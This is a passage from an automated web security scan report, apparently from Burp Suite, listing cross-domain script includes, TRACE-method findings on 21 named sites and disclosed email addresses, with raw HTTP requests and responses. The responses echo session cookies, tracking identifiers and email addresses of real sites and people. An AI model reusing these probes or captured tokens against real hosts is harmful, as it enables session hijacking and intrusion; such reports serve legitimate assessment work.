Issue detail

The response dynamically includes the following scripts from other domains:

http://cache1.stubhubstatic.com/promotions/scratch/baynote/baynote.js
http://cache1.stubhubstatic.com/promotions/scratch/foresee_v1/foresee-trigger.js
http://cache1.stubhubstatic.com/promotions/scratch/lt/bubble.min-1.0.js
http://cache1.stubhubstatic.com/promotions/scratch/lt/content-1.1.min.js
http://cache1.stubhubstatic.com/promotions/scratch/lt/geo_ui_v8.2.min.js
http://cache1.stubhubstatic.com/promotions/scratch/lt/getCookie-2.1.js
http://cache1.stubhubstatic.com/promotions/scratch/lt/omniSearch_02.js
http://cache1.stubhubstatic.com/promotions/scratch/test/mbox.js
http://cache1.stubhubstatic.com/promotions/scratch/test/s_code_common.js
http://cache1.stubhubstatic.com/resources/js/third_party/jquery.autocomplete.js
http://cache1.stubhubstatic.com/resources/mojito/js/common/stubhub-1.2.js
http://cache1.stubhubstatic.com/resources/mojito/js/feature/ticket-1.0.js
http://cache1.stubhubstatic.com/resources/mojito/js/lib/jquery.bundle.201105231737.min.js
http://cache1.stubhubstatic.com/resources/mojito/js/pattern/phoenix-RC.js
http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js

Request

Response

21.91. http://www.stumbleupon.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/submit

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://cdn.stumble-upon.com/js/attach_su.js?v=20110718-01
http://cdn.stumble-upon.com/js/plugins_su.js?v=20110718-01

Request

Response

21.92. http://www.techexcel.com/products/devsuite/devteststudio.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.techexcel.com
Path:	/products/devsuite/devteststudio.html

Issue detail

The response dynamically includes the following script from another domain:

https://apis.google.com/js/plusone.js

Request

Response

21.93. http://www.versionone.com/Product/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.versionone.com
Path:	/Product/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.jquerytools.org/1.1.2/full/jquery.tools.min.js
http://munchkin.marketo.net/munchkin.js

Request

GET /Product/ HTTP/1.1
Host: www.versionone.com
Proxy-Connection: keep-alive
Referer: http://pm.versionone.com/AgilePoster.html?c-aws=aps&gr-apss&v-010&gclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; _mkto_trk=id:040-EEX-147&token:_mch-versionone.com-1311085361365-31952; __utma=174222397.1249898466.1311085361.1311085361.1311085361.1; __utmb=174222397.1.10.1311085361; __utmc=174222397; __utmz=174222397.1311085361.1.1.utmgclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ|utmccn=(not%20set)|utmcmd=(not%20set); s_vi=[CS]v1|2712C995051D310C-4000012AC02E50CA[CE]; ASPSESSIONIDCCQACASR=JNBKCBDCLNHEPCHJEOODAHCK; s_sq=vonenewprod%3D%2526pid%253Dlead%252520form%25253A%252520agile%252520poster%25253A%252520mkto%252520form%2526pidt%253D1%2526oid%253Dhttp%25253A//www.versionone.com/Product%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:23:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 22567
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Agile Project
...[SNIP]...
<link rel="icon" href="/images/favicon.ico" />

<script src="http://cdn.jquerytools.org/1.1.2/full/jquery.tools.min.js"></script>
...[SNIP]...

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

22. TRACE method is enabled previous next
There are 21 instances of this issue:

http://ads.as4x.tmcs.ticketmaster.com/
http://bh.contextweb.com/
http://bing.fansnap.com/
http://blog.linode.com/
http://cache.specificmedia.com/
http://cdn1.diggstatic.com/
http://cheetah.vizu.com/
http://clk.specificclick.net/
http://digg.com/
http://matcher-apx.bidder7.mookie1.com/
http://matcher-cwb.bidder7.mookie1.com/
http://matcher.bidder7.mookie1.com/
http://matcher.bidder8.mookie1.com/
http://puma.vizu.com/
http://rmedia.boston.com/
http://rt.legolas-media.com/
http://sharethis.com/
http://t.mookie1.com/
http://widgets.outbrain.com/
http://www.seapine.com/
http://www.stumbleupon.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

22.1. http://ads.as4x.tmcs.ticketmaster.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.as4x.tmcs.ticketmaster.com
Path:	/

Request

TRACE / HTTP/1.0
Host: ads.as4x.tmcs.ticketmaster.com
Cookie: 197ce159ae2376c5

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads.as4x.tmcs.ticketmaster.com
Cookie: 197ce159ae2376c5; NGUserID=a4b2480-32187-970230788-20; GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_
...[SNIP]...

22.2. http://bh.contextweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 903f9c3189259ed8

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Content-Type: message/http
Content-Length: 886
Date: Tue, 19 Jul 2011 18:37:29 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 903f9c3189259ed8; cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd
...[SNIP]...

22.3. http://bing.fansnap.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/

Request

TRACE / HTTP/1.0
Host: bing.fansnap.com
Cookie: b0e80d6ebe82b186

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:42 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: bing.fansnap.com
Cookie: b0e80d6ebe82b186; tvid=; bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRV
...[SNIP]...

22.4. http://blog.linode.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.linode.com
Path:	/

Request

TRACE / HTTP/1.0
Host: blog.linode.com
Cookie: 91d1aedfbe20998e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:31:39 GMT
Server: Apache/2.2.8 (Ubuntu)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blog.linode.com
Cookie: 91d1aedfbe20998e; __utma=237427869.559622143.1311085869.1311085869.1311085869.1; __utmb=237427869.1.10.1311085869; __utmc=237427869; __utmz=237427869.1311085869.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|u
...[SNIP]...

22.5. http://cache.specificmedia.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.specificmedia.com
Path:	/

Request

TRACE / HTTP/1.0
Host: cache.specificmedia.com
Cookie: 56ad97b12d61a141

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:20 GMT
Server: PWS/1.7.2.3
X-Px: nc jfk-agg-n63 ( origin>CONN)
Content-Length: 360
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: ads.specificmedia.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 jfk-agg-n63.panthercdn.com PWS/1.7.2.3
X-Forwarded-For: 173.193.214.243, 66.114.49.73
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://cache.specificmedia.com/
Cookie: 56ad97b12d61a141
Connection: keep-alive

22.6. http://cdn1.diggstatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn1.diggstatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: cdn1.diggstatic.com
Cookie: 3fe9f2a6727317e8

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:38 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: 3fe9f2a6727317e8
Accept-Encoding: gzip
Host: media.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.21
x-chpd-loop: 1
Via: 1.0 PXY008-ASHB.COTENDO.NET (chpd/4.01.0008.8)
Cneonct
...[SNIP]...

22.7. http://cheetah.vizu.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cheetah.vizu.com
Path:	/

Request

TRACE / HTTP/1.0
Host: cheetah.vizu.com
Cookie: b3e5f20c9803fbb4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:23 GMT
Server: PWS/1.7.2.3
X-Px: nc iad-agg-n29 ( origin>CONN)
Content-Length: 354
Content-Type: message/http
Connection: close

TRACE /ie/ HTTP/1.1
Host: adcatalyst.vizu.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n29.panthercdn.com PWS/1.7.2.3
X-Forwarded-For: 173.193.214.243, 66.114.52.39
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://cheetah.vizu.com/
Cookie: b3e5f20c9803fbb4
Connection: keep-alive

22.8. http://clk.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.specificclick.net
Path:	/

Request

TRACE / HTTP/1.0
Host: clk.specificclick.net
Cookie: 48d3874811ac5569

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 92
Date: Tue, 19 Jul 2011 20:44:45 GMT
Connection: close

TRACE / HTTP/1.0
host: clk.specificclick.net
cookie: 48d3874811ac5569; ug=WPTUOuwXp9NyRD

22.9. http://digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/

Request

TRACE / HTTP/1.0
Host: digg.com
Cookie: 3b6e05b8cf43111a

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: digg.com
Cookie: 3b6e05b8cf43111a; d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2; traffic_control=f041000000601100001689866400%3A221%3A112; __utma=146621099.1841421009.1311085718.1311085718.1311085718.1; __utmb=14
...[SNIP]...

22.10. http://matcher-apx.bidder7.mookie1.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://matcher-apx.bidder7.mookie1.com
Path:	/

Request

TRACE / HTTP/1.0
Host: matcher-apx.bidder7.mookie1.com
Cookie: 56488ab3e0aca14f

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:00 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-apx.bidder7.mookie1.com
Cookie: 56488ab3e0aca14f; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ti
...[SNIP]...

22.11. http://matcher-cwb.bidder7.mookie1.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://matcher-cwb.bidder7.mookie1.com
Path:	/

Request

TRACE / HTTP/1.0
Host: matcher-cwb.bidder7.mookie1.com
Cookie: 3dac40085069acde

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:38:08 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-cwb.bidder7.mookie1.com
Cookie: 3dac40085069acde; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ti
...[SNIP]...

22.12. http://matcher.bidder7.mookie1.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://matcher.bidder7.mookie1.com
Path:	/

Request

TRACE / HTTP/1.0
Host: matcher.bidder7.mookie1.com
Cookie: cc0191b083c501c1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:37:01 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher.bidder7.mookie1.com
Cookie: cc0191b083c501c1; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ti
...[SNIP]...

22.13. http://matcher.bidder8.mookie1.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://matcher.bidder8.mookie1.com
Path:	/

Request

TRACE / HTTP/1.0
Host: matcher.bidder8.mookie1.com
Cookie: 330ef759185428c0

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:37:27 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher.bidder8.mookie1.com
Cookie: 330ef759185428c0; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ti
...[SNIP]...

22.14. http://puma.vizu.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://puma.vizu.com
Path:	/

Request

TRACE / HTTP/1.0
Host: puma.vizu.com
Cookie: 7ed2d0f24439cba2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:21 GMT
Server: PWS/1.7.2.3
X-Px: nc iad-agg-n5 ( origin>CONN)
Content-Length: 343
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: origin.vizu.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n5.panthercdn.com PWS/1.7.2.3
X-Forwarded-For: 173.193.214.243, 66.114.52.15
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://puma.vizu.com/
Cookie: 7ed2d0f24439cba2
Connection: keep-alive

22.15. http://rmedia.boston.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/

Request

TRACE / HTTP/1.0
Host: rmedia.boston.com
Cookie: e0b552b1c3815535

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rmedia.boston.com
Cookie: e0b552b1c3815535; OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; RMFD=011QK73VO205zQN|O105zfl
Co
...[SNIP]...

22.16. http://rt.legolas-media.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/

Request

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 7931fe05c2b81c4a

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 7931fe05c2b81c4a; ui=e01db2f2-208a-43e5-beec-a78df4693afe; lgpr=//8=; lgtix=NQACAAQBBgABAAMBRAQDAPQASQABAAMBSgABAAMBDAABAAMB/QACAAMBXwABAAMB
X-Forwarded-For: 173.193.214.243

22.17. http://sharethis.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sharethis.com
Path:	/

Request

TRACE / HTTP/1.0
Host: sharethis.com
Cookie: 895a9ceb6325ee9b

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:32 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: sharethis.com
Cookie: 895a9ceb6325ee9b; __uset=yes; __utmb=164916925.2.9.1311085613; __utmc=164916925; __stid=CspjoE3OVb2YWRTJR8rMAg==; __utmz=206367559.1308922055.12.12.utmcsr=article.wn.com|utmccn=(referral)|utmcmd=referral|utmcct=/view/
...[SNIP]...

22.18. http://t.mookie1.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.mookie1.com
Path:	/

Request

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: f464557de0591141

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:58 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: f464557de0591141; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ti
...[SNIP]...

22.19. http://widgets.outbrain.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.outbrain.com
Path:	/

Request

TRACE / HTTP/1.0
Host: widgets.outbrain.com
Cookie: ee484a15c59a7212

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:18 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
Connection: close

TRACE / HTTP/1.1
Cookie: ee484a15c59a7212; obuid=34e83892-8848-4a54-a4d4-8bdbba750320; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; tick=1311108255000; _lvs2="O2ZXNI+sQ3qFHV61t3sdYQ=="; _lvd2="iYJQahqaNoybZPBlL1y+oQ=="; recs-ad82f50455df441759d1d8530ecd
...[SNIP]...

22.20. http://www.seapine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seapine.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.seapine.com
Cookie: b36776f0b8ef85a0

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:49 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.seapine.com
Cookie: b36776f0b8ef85a0; SourceKey=201107191020391579

22.21. http://www.stumbleupon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.stumbleupon.com
Cookie: ee0154814b05613e

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Content-Type: message/http
Content-Length: 652
Date: Tue, 19 Jul 2011 14:28:26 GMT
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: ee0154814b05613e; su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=
...[SNIP]...

23. Email addresses disclosed previous next
There are 75 instances of this issue:

http://ads.msn.com/library/dapmsn.js
http://az10143.vo.msecnd.net/sitecore/dbing/media/Images/homepage/rr-partypeople.jpg
http://b3.mookie1.com/RealMedia/ads/Creatives/USNetwork/TRACK_MIG/mig_analytics.js
http://cache.boston.com/universal/js/bcom_hp_scripts.js
http://cache.boston.com/universal/js/twitterwidget.js
http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js
http://cdn-0.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js
http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js
http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js
http://feedburner.google.com/fb/feed-styles/bf30.js
http://i2.onlinehelp.microsoft.com/Areas/Global/Content/Omniture/resources/OnlineHelp/omni_rsid_OnlineHelp.js
https://login.live.com/login.srf
http://majornelson.com/wp-content/themes/roundhouse/style.css
http://media.gamehouse.com/4/js/s_code_test.js
http://media.ticketmaster.com/en-us/js/1cf39641cc0465a6e003b267636b5ebb/prototype/controls.js
http://realnetworks.com/WorkArea/java/ektron.js
http://realnetworks.com/pressroom/index.aspx
http://service.real.com/international/br/
http://sharethis.com/account/signin-widget
http://sharethis.com/ext/adapter/ext/ext-base.js
http://sharethis.com/ext/ext-all.js
http://sharethis.com/ext/resources/css/ext-all.css
http://sharethis.com/privacy
http://sharethis.com/register
http://umfcluj.ro/js/jquery.emptyOnFocus.js
http://umfcluj.ro/js/jquery.hoverIntent.js
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/lista.aspx
http://w.sharethis.com/button/buttons.js
http://widgets.outbrain.com/outbrainWidget.js
http://widgets.twimg.com/j/2/widget-2.2.css
http://www.bnymellon.com/foresight/index.html
http://www.bnymellon.com/foresight/richardhoey.html
http://www.bnymellon.com/wealthmanagement/index.html
http://www.factset.com/
http://www.factset.com/events
http://www.factset.com/files/jquery/nifty/niftycube.js
http://www.factset.com/images/searchInputBg.gif
http://www.factset.com/products/im
http://www.factset.com/products/im/img/im/title_1_2.png
http://www.factset.com/products/privateequity
http://www.fansnap.com/
http://www.fansnap.com/developers
http://www.fastteks.com/TechSolutions/About-Us.aspx
http://www.fastteks.com/TechSolutions/Contact-Us.aspx
http://www.fastteks.com/TechSolutions/Default.aspx
http://www.fastteks.com/TechSolutions/News.aspx
http://www.fastteks.com/TechSolutions/Services.aspx
http://www.fastteks.com/techsolutions/
http://www.gamestop.com/
http://www.googlelabs.com/
http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx
http://www.intelex.com/landing/~/script/highslide/highslide.css
http://www.linode.com/faq.cfm
http://www.livedrive.com/Scripts/PreloadImages.js
http://www.livedrive.com/Scripts/typeface.js
http://www.mavitunasecurity.com/
http://www.mookie1.com/contact.php
http://www.netlogiq.ro/js/jquery.emptyOnFocus.js
http://www.netlogiq.ro/js/jquery.hoverIntent.js
http://www.nne.aaa.com/_Layouts/ACSC.MasterMenu.jQuery/jquery.bgiframe.js
http://www.nne.aaa.com/style%20library/js/tracking/sitecatalyst_scode.js
http://www.rallydev.com/js/jquery.colorbox-min.js
http://www.stubhub.com/
http://www.stubhub.com/content/getPromoContent
http://www.ticketmaster.com/event/000043582C516D43
http://www.versionone.com/LandingPgTemp/js/global.js
http://www.versionone.com/js/global.js
http://www.versionone.com/js/s_code.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

23.1. http://ads.msn.com/library/dapmsn.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.msn.com
Path:	/library/dapmsn.js

Issue detail

The following email address was disclosed in the response:

inet@microsoft.com

Request

GET /library/dapmsn.js HTTP/1.1
Host: ads.msn.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; CC=US; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; __switchTo5x=94; __unam=7a54b75-130adfe6f89-5d6f1b4f-2; MUID=E361C23374E642C998D8ABA7166A75EC; MSNTVID=e9b0b7965c774fdb94f4dbbf73989380; mh=LENOVO; Sample=93; SRCHHPGUSR=AS=1; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: max-age=172800
Date: Tue, 19 Jul 2011 15:19:19 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Jun 2011 17:27:41 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3877

function verifyDapResize(a){var b=dapMgr.adCont;!b[a].resizeCalled&&dap_Resize(b[a].ifrmid,b[a].w,b[a].h)}function dap_Resize(a,c,b){document.getElementById(a).width=c;document.getElementById(a).heigh
...[SNIP]...

23.2. http://az10143.vo.msecnd.net/sitecore/dbing/media/Images/homepage/rr-partypeople.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://az10143.vo.msecnd.net
Path:	/sitecore/dbing/media/Images/homepage/rr-partypeople.jpg

Issue detail

The following email address was disclosed in the response:

lars@larstopelmann.com

Request

GET /sitecore/dbing/media/Images/homepage/rr-partypeople.jpg HTTP/1.1
Host: az10143.vo.msecnd.net
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a71be9da-385a-45ab-b672-9d67c538b004=%7B%22parent_id%22%3A%229uMSzSBW7pb%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%22B5nUnLnLLMn%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Faz10143.vo.msecnd.net%2Fweb%2Foie9%2Findex_tyie9A.html%23fbid%3D9uMSzSBW7pb%26wom%3Dfalse%22%2C%22url_tag%22%3A%22NOMTAG%22%7D

Response

HTTP/1.1 200 OK
Content-Length: 14027
Content-Type: application/octet-stream
Content-MD5: DxfOPoOrBghkR6SVbhSKkQ==
ETag: 0x8CDF8F745899615
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 66dc813b-481f-4059-a5de-6ff0b5ddd5db
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Age: 10531
Date: Tue, 19 Jul 2011 15:17:00 GMT
Last-Modified: Tue, 14 Jun 2011 22:12:23 GMT
Connection: keep-alive

